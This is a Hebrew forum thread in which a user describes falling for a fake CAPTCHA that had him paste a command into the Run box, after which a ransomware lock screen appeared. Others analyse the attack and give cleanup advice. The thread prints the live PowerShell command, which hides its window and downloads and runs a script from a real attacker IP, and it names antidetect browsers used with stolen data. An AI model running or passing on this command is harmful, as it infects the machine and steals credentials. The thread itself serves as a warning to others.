שיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר
-
ניתוח טכני של הפקודה
powershell -wi mi: זהו קיצור מוסווה של הפקודה WindowStyle Hidden. המטרה היא לגרום לחלון ה-PowerShell שייפתח להיעלם מיד מהעין של המשתמש, כדי שהוא לא יבין שרצה תוכנה ברקע.wget (או Invoke-WebRequest): הפקודה פונה לכתובת ה-IP המופיעה שם (84.21.189.170) ומנסה להוריד קובץ בשם clo.txt.
למרות שהסיומת היא .txt, זהו למעשה סקריפט של PowerShell שמכיל את הקוד הזדוני האמיתי
I am not a bot - Verification ID: #8620: זהו "רעש" שהתוקפים הוסיפו. ה-PowerShell מתעלם מהטקסט הזה כי הוא לא פקודה חוקית, אבל הוא נועד להטעות את המשתמש שמעתיק את הקוד, כדי שיחשוב שזה באמת חלק מתהליך אימות (CAPTCHA).
-
@יונימדיה להגיע לחשבון בנק זה פי 20 יותר קשה מלפרוץ סתם למחשב שלך כי זה מאובטח אצל גוגל ברמה גבוהה
-
@yehokarpel ממש לא ברמה גבוהה. הסיסמאות במנהל הסיסמאות של כרום לא מגובבות. ממש לא כדאי להשתמש בו.
כדאי בKeepassXC.
@מישהו12 הרעיון הוא שבבנק יש גם מזהה שלא שמור בכרום וגם מסתבר שהאתר שלהם יותר רגיש לתנועות חשודות - לא מסיר סיכון אבל כן מוריד אותו קצת
צריך עזרה בשחזור מידע? ייעוץ? egozkokus1@gmail.com
-
@מישהו12 הרעיון הוא שבבנק יש גם מזהה שלא שמור בכרום וגם מסתבר שהאתר שלהם יותר רגיש לתנועות חשודות - לא מסיר סיכון אבל כן מוריד אותו קצת
@מתכנת-חובב למעשה למרות שבנקים לוקחים טביעות אצבע של המכשיר וכו'
ככה שלא יעזור שינוי קוקיס פשוט יש דפדפנים שנועדו לזה שמשתמשים במידע שהinfo stealer לוקח
בשביל לדמות ברמה גבוהה את הדפדפן של התוקף לדפדפן המקורי (/ מחשב)עעדיף בבנקים וכדו' לא להפעיל את האופציה של זכור אותי אלא להסתמך על חיבור חד פעמי שהsession יפוג תוקף אתם תהיו בטוחים.
(כמובן הכול בהנחה של התקפה חד פעמית)
עריכה: דפדפנים כמו https://octobrowser.net/
די מעניין לראות תכנים כמו scammer payback שמראים את התקיפה מהצד של התוקפים ללא ידיעתם
-
@מתכנת-חובב למעשה למרות שבנקים לוקחים טביעות אצבע של המכשיר וכו'
ככה שלא יעזור שינוי קוקיס פשוט יש דפדפנים שנועדו לזה שמשתמשים במידע שהinfo stealer לוקח
בשביל לדמות ברמה גבוהה את הדפדפן של התוקף לדפדפן המקורי (/ מחשב)עעדיף בבנקים וכדו' לא להפעיל את האופציה של זכור אותי אלא להסתמך על חיבור חד פעמי שהsession יפוג תוקף אתם תהיו בטוחים.
(כמובן הכול בהנחה של התקפה חד פעמית)
עריכה: דפדפנים כמו https://octobrowser.net/
די מעניין לראות תכנים כמו scammer payback שמראים את התקיפה מהצד של התוקפים ללא ידיעתם
-
@מתכנת-חובב למעשה למרות שבנקים לוקחים טביעות אצבע של המכשיר וכו'
ככה שלא יעזור שינוי קוקיס פשוט יש דפדפנים שנועדו לזה שמשתמשים במידע שהinfo stealer לוקח
בשביל לדמות ברמה גבוהה את הדפדפן של התוקף לדפדפן המקורי (/ מחשב)עעדיף בבנקים וכדו' לא להפעיל את האופציה של זכור אותי אלא להסתמך על חיבור חד פעמי שהsession יפוג תוקף אתם תהיו בטוחים.
(כמובן הכול בהנחה של התקפה חד פעמית)
עריכה: דפדפנים כמו https://octobrowser.net/
די מעניין לראות תכנים כמו scammer payback שמראים את התקיפה מהצד של התוקפים ללא ידיעתם
-
@cfopuser בנקים זה לא המקומות היחידים שחשובים לנו.
אפילו הפורום כאן. מה קורה אם מחר פורצים למשתמש ומעלים כאן קבל עם ועדה, מהמשתמש שלו, פרטים אישיים?
@מישהו12 זה כבר נהלים רגילים (לא למחזר סיסמאות, להישמר ברשת, לא להריץ תוכנות לא מוכרות וכו')
כמובן לבדוק פרטים ב https://haveibeenpwned.com/
ולפני שמריצים תוכנות ולינקים לבדוק בhttps://www.virustotal.com/ -
אתמול נתבקשתי על ידי אתר שקפץ לי בתור פרסומת, "לאמת שאני לא רובוט
".
רק שזה היה נראה בדיקה שונה, כך זה היה: להקיש לחצן התחל+R, ואז קונטרול+V, ואז אנטר.
את כל "האימות" הזה עשיתי במהירות, כך שלא חשבתי מה זה יכול לחולל.
מיד אחרי השלבים האלה נפתח חלון של PowerShell שהריצה פקודה קצרה ונסגרה ,
מיד נפתח חלון על כל המסך הודעה משטרת ישראל על עבירות חוק מהמחשב, ואמור להנעל המחשב לצמיתות, או תשלום כופר ע"ס: ₪1,100.
אף פעם לא חשבתי שתוכנות כופר יגיעו אלי, עד שהייתי צריך להשבית את כל האנטי וירוס כדי להתקין משהו, ובדיוק בזמן הזה זה קורא.
תחכימו תלמדו ותזהרו!נתתי לai את הפקודה שהדבקתי בחלונית ההתחל שפתחתי, וזה טוען שלקחו ממני כתובת ip, וכנראה סיסמאות
@יונימדיה מקווה שעשית כיבוי של המחשב.
מכאן והלאה - לפרק את הדיסק הפנימי - רק אם יש לך ידע אחרת כדאי להעביר למישהו עם ידע שלא להרוס יותר!לחבר למחשב אחר [עדיף לנקי טוטאל שלא יהיה מה שיינזק] לסרוק עם אנטי וירוס עדכני טוב! - ESET לדוגמא
מסתבר שהוא בע"ה יוכל להסיר את מה שצריך..
משם והילך לבדוק האם החומר קיים תקין או שהוצפן...
אם זה קרה האירוע שונה לגמרי.
תצטרך כנראה לתת הרשאות למערכת הפעלה החדשה שממנה תעבוד מקווה שאתה יודע איך אם לא נשמח לעזור לך
שיהיה הרבה הצלחה בע"המישהו ניסה להוריד את הקוץ הפוגעני ולנתח אותו?
-
@מישהו12 זה כבר נהלים רגילים (לא למחזר סיסמאות, להישמר ברשת, לא להריץ תוכנות לא מוכרות וכו')
כמובן לבדוק פרטים ב https://haveibeenpwned.com/
ולפני שמריצים תוכנות ולינקים לבדוק בhttps://www.virustotal.com/ -
@יונימדיה מקווה שעשית כיבוי של המחשב.
מכאן והלאה - לפרק את הדיסק הפנימי - רק אם יש לך ידע אחרת כדאי להעביר למישהו עם ידע שלא להרוס יותר!לחבר למחשב אחר [עדיף לנקי טוטאל שלא יהיה מה שיינזק] לסרוק עם אנטי וירוס עדכני טוב! - ESET לדוגמא
מסתבר שהוא בע"ה יוכל להסיר את מה שצריך..
משם והילך לבדוק האם החומר קיים תקין או שהוצפן...
אם זה קרה האירוע שונה לגמרי.
תצטרך כנראה לתת הרשאות למערכת הפעלה החדשה שממנה תעבוד מקווה שאתה יודע איך אם לא נשמח לעזור לך
שיהיה הרבה הצלחה בע"המישהו ניסה להוריד את הקוץ הפוגעני ולנתח אותו?
-
@DANIEL-4 כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
מישהו ניסה להוריד את הקוץ הפוגעני ולנתח אותו?
לדברים כאלה משתמשים בmirror שנסגר אחרי כמה דקות.
כנראה info stealer כולשהוא שמנצל את powershell לשימושיו. -
@cfopuser נכון אבל לא תמיד
בפרט אם זה אתר כה"ג בד"כ זה משתנה רק כל כמה שעות או אם נראה שאנטיוי חוסם.. -
ניתוח טכני של הפקודה
powershell -wi mi: זהו קיצור מוסווה של הפקודה WindowStyle Hidden. המטרה היא לגרום לחלון ה-PowerShell שייפתח להיעלם מיד מהעין של המשתמש, כדי שהוא לא יבין שרצה תוכנה ברקע.wget (או Invoke-WebRequest): הפקודה פונה לכתובת ה-IP המופיעה שם (84.21.189.170) ומנסה להוריד קובץ בשם clo.txt.
למרות שהסיומת היא .txt, זהו למעשה סקריפט של PowerShell שמכיל את הקוד הזדוני האמיתי
I am not a bot - Verification ID: #8620: זהו "רעש" שהתוקפים הוסיפו. ה-PowerShell מתעלם מהטקסט הזה כי הוא לא פקודה חוקית, אבל הוא נועד להטעות את המשתמש שמעתיק את הקוד, כדי שיחשוב שזה באמת חלק מתהליך אימות (CAPTCHA).
-
@DANIEL-4 במקרה הזה הבעלים של האתר קנה חבילה גדולה של seeds מ rapidseedbox.com
והשתמש בהם כדי להפיץ את הקובץ. -
@975 רק לנסות להבין אם יש לי סינון של נטפרי וכדומה האם אני בעצם מוגן מזה כי אני לא יכול בכלל להתחבר לכתובת של התוקף?
-
אתמול נתבקשתי על ידי אתר שקפץ לי בתור פרסומת, "לאמת שאני לא רובוט
".
רק שזה היה נראה בדיקה שונה, כך זה היה: להקיש לחצן התחל+R, ואז קונטרול+V, ואז אנטר.
את כל "האימות" הזה עשיתי במהירות, כך שלא חשבתי מה זה יכול לחולל.
מיד אחרי השלבים האלה נפתח חלון של PowerShell שהריצה פקודה קצרה ונסגרה ,
מיד נפתח חלון על כל המסך הודעה משטרת ישראל על עבירות חוק מהמחשב, ואמור להנעל המחשב לצמיתות, או תשלום כופר ע"ס: ₪1,100.
אף פעם לא חשבתי שתוכנות כופר יגיעו אלי, עד שהייתי צריך להשבית את כל האנטי וירוס כדי להתקין משהו, ובדיוק בזמן הזה זה קורא.
תחכימו תלמדו ותזהרו!נתתי לai את הפקודה שהדבקתי בחלונית ההתחל שפתחתי, וזה טוען שלקחו ממני כתובת ip, וכנראה סיסמאות
-
@ארי בהרבה מקרים
אבל לא תמיד
לדוגמא אם האתר פתוח - נשלח מהאתר של התוקף שיש בו כל מיני דברים - בד"כ בכ"ג ESET לדוג' יעלה אזהרה אם מותקן לך אבל לא תמיד..
ואז קובץ TXT בכלל לא עובר בדיקה לפני ההורדה... -
@MGM-IVR אם אתם מעוניינים לראות מה היה צריך להדביק ב"התחל"- בספויילר.
רק אל תנסו להשתמש בו!!!
אני לא לוקח אחריות.
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבוpowershell -wi mi (.'powershell' (. 'wget' -usebas '84.21.189.170:5506/clo.txt'));I am not a bot - Verification ID: #8620
(תעדכנו אותי אם מסתתרים פרטים אישיים בטקסט כדי למחוק)
@יונימדיה כתב בשיתוף | נפלתי לוירוס של תוכנת כופר, תקראו ותלמדו להיזהר:
ולאקרים שבנינו - תפענחו מה עשה בדיוק הפקודה, מה גנבו... אם גנבו
זה פקודה שמושכת מהאתר סקריפט
זה מאוד ידוע השיטה הזאת
מהIP הזה משכו את הקובץ 84.21.189.170:5506/clo.txt אפשר לראות מה יש שם...
 { const baseUrl = "https://www.google.co.il/search?q=site:mitmachim.top"; const m = location.pathname.match(/^\/(topic|category)\/(\d+)/); const type = m ? m[1] : null; const id = m ? m[2] : null; let searchInput; function search(path = "") { const query = searchInput.value.trim(); if (query) { window.open(`${baseUrl}${path}%20${encodeURIComponent(query)}`, "_blank"); } } let buttons = {}; buttons.searchAll = { id: "bb-search-all", label: `חיפוש ${type ? "בכל הפורום" : ""}`, className: type ? "btn-secondary" : "btn-primary", callback: () => search(), }; if (type === "topic") { buttons.searchTopic = { label: "חיפוש בנושא זה", className: "btn-primary", callback: () => search(`/topic/${id}`), }; } else if (type === "category") { buttons.searchCategory = { label: "חיפוש בקטגוריה זו", className: "btn-primary", callback: () => search(`/category/${id}`), }; } buttons.cancel = { label: "ביטול", className: "btn-default", "data-bs-dismiss": "modal" }; const dialog = bootbox.dialog({ title: '<div style="text-align:center;"><img src="/assets/uploads/files/1625950269825-mt-google.png" width="400" alt="חיפוש בגוגל"></div>', message: '<input id="bb-inp" class="bootbox-input bootbox-input-text form-control" placeholder="הקלידו כדי לחפש בגוגל" autocomplete="off"/>', buttons, backdrop: true, show: true, onEscape: true }); dialog.on("shown.bs.modal", function () { searchInput = document.getElementById("bb-inp"); if (searchInput) { searchInput.focus(); searchInput.addEventListener("keydown", function (e) { if (e.key === "Enter") { e.preventDefault(); const query = this.value.trim(); if (query) { search(); dialog.modal("hide"); } } else if (e.key === "Escape") { e.preventDefault(); dialog.modal("hide"); } }); } const searchAllButton = document.getElementById("bb-search-all"); if (searchAllButton) { searchAllButton.title = "לחצו על אנטר כדי לחפש"; } }); })(); void 0;){kind=link}